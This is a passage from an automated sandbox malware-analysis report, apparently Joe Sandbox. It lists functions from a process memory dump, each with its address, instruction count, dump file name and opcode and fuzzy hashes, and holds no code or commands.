              • Instruction Fuzzy Hash: AD018B30A2550E9EDB59EFA4C4695B973A1FF18305F11087DD41ED21F5DE367250CA01
              Function 00007FFD9B9E0610 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a956ea51ed3f396b8d4cf6d509edc780632440854b719c88c6d79bc88733444
              • Instruction ID: b83d710ddfc0b90211c9dec35bcf95dc946fc0562d1aa1c2cd3c351131dac446
              • Opcode Fuzzy Hash: 7a956ea51ed3f396b8d4cf6d509edc780632440854b719c88c6d79bc88733444
              • Instruction Fuzzy Hash: A9018130A2950E9FEB59EFA4C4686BA73A0FF18305F11087EE41EC21E5DF35A650C600
              Function 00007FFD9B9ECA69 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a90272c8e4f160ac9b3c9cce9e161b1707a6a85d33dba869d20e38992f33a99e
              • Instruction ID: 20f6c909d662c8135e8c1201fb52f9d5be299830f92e56f01f8affa35418a241
              • Opcode Fuzzy Hash: a90272c8e4f160ac9b3c9cce9e161b1707a6a85d33dba869d20e38992f33a99e
              • Instruction Fuzzy Hash: 5A018130A1E78E9FDBA5DF64C8651A93BB0FF16300F5601BAE449C61A2DA389654C781
              Function 00007FFD9B9E1140 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e5d18eed1d202ea14226e9b1f7ff63803bfb1a91d59ffc22351826c597c6609c
              • Instruction ID: 3acd11884363e268c9070bb5d4294979264b80c458361cc6bf8b4566640d3abe
              • Opcode Fuzzy Hash: e5d18eed1d202ea14226e9b1f7ff63803bfb1a91d59ffc22351826c597c6609c
              • Instruction Fuzzy Hash: F5F0A470E2A62E9DFBA49BA898647BA77E4EF95318F00417AF41AC20E1DF341754C640
              Function 00007FFD9B9E2779 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b9e8964a3ce887bbcc632b35f34f695d513b6d15a46ad5c87808c22b781bdf0
              • Instruction ID: c6a87a1e51977e6efc412819964ae64bbdddfac3952d64a250658b40f8cfdffb
              • Opcode Fuzzy Hash: 0b9e8964a3ce887bbcc632b35f34f695d513b6d15a46ad5c87808c22b781bdf0
              • Instruction Fuzzy Hash: FFF09C3051E38D4FDB599F7484651A93B70FF06304F4505BAD419C60E2DB39A654CB41
              Function 00007FFD9B9E27ED Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26877fb3d57b271a2d75e52b18f8d4f1f775c2853e907c0081ddc002167df400
              • Instruction ID: 5349f3f65b80cf23eaf4f679b9e3112130c61b74d112090fc8e3610be72cc2c5
              • Opcode Fuzzy Hash: 26877fb3d57b271a2d75e52b18f8d4f1f775c2853e907c0081ddc002167df400
              • Instruction Fuzzy Hash: 43F0B431A1E78E8FEB699FA488251F93BA0FF15300F4504BEE409C61E6EF399654C741
              Function 00007FFD9B9E0FA3 Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab88b4e2b9a93bafa7822f6d474f69dd6dc04d3368227e2be2eac527a29809eb
              • Instruction ID: 541a8f8efcbf2a7030261c5cc77d73b879a3bcd0193c70ca50755b3cd417e196
              • Opcode Fuzzy Hash: ab88b4e2b9a93bafa7822f6d474f69dd6dc04d3368227e2be2eac527a29809eb
              • Instruction Fuzzy Hash: 00E0B630E2960E8AEB64EB54C8A5BAE7B71BF54304F5141B9D40DA719ADE346E808F90